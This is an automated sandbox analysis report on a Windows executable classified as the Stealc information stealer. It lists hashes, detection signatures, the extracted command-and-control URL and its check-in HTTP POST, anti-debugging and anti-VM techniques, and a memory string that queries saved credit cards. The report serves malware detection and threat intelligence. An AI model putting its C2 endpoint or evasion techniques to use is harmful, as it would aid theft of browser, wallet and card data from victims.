Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1532741
MD5:	054dffcd797e0e40c9e7b3050814f148
SHA1:	d5d545a246bb31a238e4a2632bdc878a35bd8d7e
SHA256:	6dbfc677cbb25ac652a97431f9afc4811639b3dae9b640976c0b9bb8d9a54404
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.37/ws	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.file.exe.5c0000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_005CC820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005C7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_005C7240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005C9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_005C9AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005C9B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_005C9B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_005D8EA0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005D38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005D4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_005CDA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_005CE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_005D4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_005CED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_005CBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005CDE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005C16D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005CF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_005D3EA0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.37/e2b1563c6670f193.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 44 33 34 39 31 34 36 41 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 2d 2d 0d 0a Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="hwid"D9D349146A8B2768236643------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="build"doma------AFHDAEGHDGDBGDGDAAFI--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Source: unknown

DNS traffic detected: query: 198.187.3.20.in-addr.arpa replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005C4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_005C4880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 44 33 34 39 31 34 36 41 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 2d 2d 0d 0a Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="hwid"D9D349146A8B2768236643------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="build"doma------AFHDAEGHDGDBGDGDAAFI--

Source: file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2215149403.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2215149403.0000000001505000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpuL
Source: file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37L

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090F027	0_2_0090F027
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5	0_2_0098E1D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00996969	0_2_00996969
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009932C9	0_2_009932C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A13A09	0_2_00A13A09
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00908BEA	0_2_00908BEA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098AC3B	0_2_0098AC3B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008BC434	0_2_008BC434
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008FDC30	0_2_008FDC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098FC59	0_2_0098FC59
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0099847F	0_2_0099847F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00994DBC	0_2_00994DBC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008F8DF4	0_2_008F8DF4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008C1EA6	0_2_008C1EA6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0096DE1D	0_2_0096DE1D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098C74C	0_2_0098C74C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0099177F	0_2_0099177F

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 005C45C0 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: yhphlozs ZLIB complexity 0.9949685097603256

Source: file.exe, 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2161251258.00000000052F0000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_005D9600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_005D3720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\EHI8I06B.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cardsr?;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1854976 > 1048576

Source: file.exe

Static PE information: Raw size of yhphlozs is bigger than: 0x100000 < 0x19ea00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.5c0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;yhphlozs:EW;rdjojuwm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;yhphlozs:EW;rdjojuwm:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_005D9860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1cdfff should be: 0x1d161e

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: yhphlozs
Source: file.exe	Static PE information: section name: rdjojuwm
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009CC0CE push edx; mov dword ptr [esp], esp	0_2_009CC10B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A138F2 push 71AE9534h; mov dword ptr [esp], ecx	0_2_00A1391A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005DB035 push ecx; ret	0_2_005DB048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A758CE push 680F0635h; mov dword ptr [esp], esp	0_2_00A758D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A758CE push 5B8C78D7h; mov dword ptr [esp], eax	0_2_00A75FD2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090F027 push edi; mov dword ptr [esp], ebx	0_2_0090F0B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090F027 push ebp; mov dword ptr [esp], 5FDFE3EEh	0_2_0090F174
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090F027 push 69B550A1h; mov dword ptr [esp], ebx	0_2_0090F1A5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090F027 push 1350B330h; mov dword ptr [esp], edx	0_2_0090F26E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090F027 push 514680F2h; mov dword ptr [esp], eax	0_2_0090F2A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090F027 push 395FF5D2h; mov dword ptr [esp], edx	0_2_0090F2B6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D4840 push ebx; mov dword ptr [esp], 123D5D00h	0_2_009D484C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009BE07D push 4E27B35Bh; mov dword ptr [esp], eax	0_2_009BE092
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009BE07D push ebp; mov dword ptr [esp], edx	0_2_009BE0E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A33852 push edi; mov dword ptr [esp], 02C24316h	0_2_00A33856
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A33852 push eax; mov dword ptr [esp], edx	0_2_00A33981
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008C718F push ecx; mov dword ptr [esp], eax	0_2_008C723B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008C718F push esi; mov dword ptr [esp], 64AEEE82h	0_2_008C727F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008C718F push ecx; mov dword ptr [esp], edx	0_2_008C7310
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008C718F push ebx; mov dword ptr [esp], ebp	0_2_008C7314
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A2C98D push 6AC2D9FCh; mov dword ptr [esp], ebx	0_2_00A2C9B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A2C98D push 5FD3D891h; mov dword ptr [esp], ecx	0_2_00A2C9BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A069EC push esi; mov dword ptr [esp], ecx	0_2_00A06A56
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5 push edx; mov dword ptr [esp], ecx	0_2_0098E1DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5 push esi; mov dword ptr [esp], ecx	0_2_0098E214
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5 push eax; mov dword ptr [esp], 4C97D83Ah	0_2_0098E23E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5 push ebx; mov dword ptr [esp], 17851D7Dh	0_2_0098E2CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5 push 1DCB9CECh; mov dword ptr [esp], esi	0_2_0098E316
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5 push ecx; mov dword ptr [esp], ebp	0_2_0098E391
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5 push eax; mov dword ptr [esp], edi	0_2_0098E3B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5 push 172EDC16h; mov dword ptr [esp], ecx	0_2_0098E402

Source: file.exe

Static PE information: section name: yhphlozs entropy: 7.95378057749378

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_005D9860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99C546 second address: 99C55E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F7F147AEA4Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99C7FE second address: 99C804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99C804 second address: 99C809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99CAFB second address: 99CB01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99CB01 second address: 99CB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99CB05 second address: 99CB3B instructions: 0x00000000 rdtsc 0x00000002 je 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F7F1511CE2Ah 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 pushad 0x00000019 jp 00007F7F1511CE26h 0x0000001f jmp 00007F7F1511CE36h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0713 second address: 9A0719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0719 second address: 9A071E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A071E second address: 9A0775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 647CAD3Fh 0x0000000e sub cx, 0E59h 0x00000013 push 00000003h 0x00000015 mov ch, bl 0x00000017 push 00000000h 0x00000019 jmp 00007F7F147AEA4Eh 0x0000001e or dword ptr [ebp+122D35E9h], edi 0x00000024 push 00000003h 0x00000026 jmp 00007F7F147AEA4Dh 0x0000002b pushad 0x0000002c mov dword ptr [ebp+122D2B54h], edx 0x00000032 push eax 0x00000033 mov dword ptr [ebp+122D28EFh], ebx 0x00000039 pop ebx 0x0000003a popad 0x0000003b push 722811A0h 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 pop eax 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0775 second address: 9A0779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0779 second address: 9A077F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
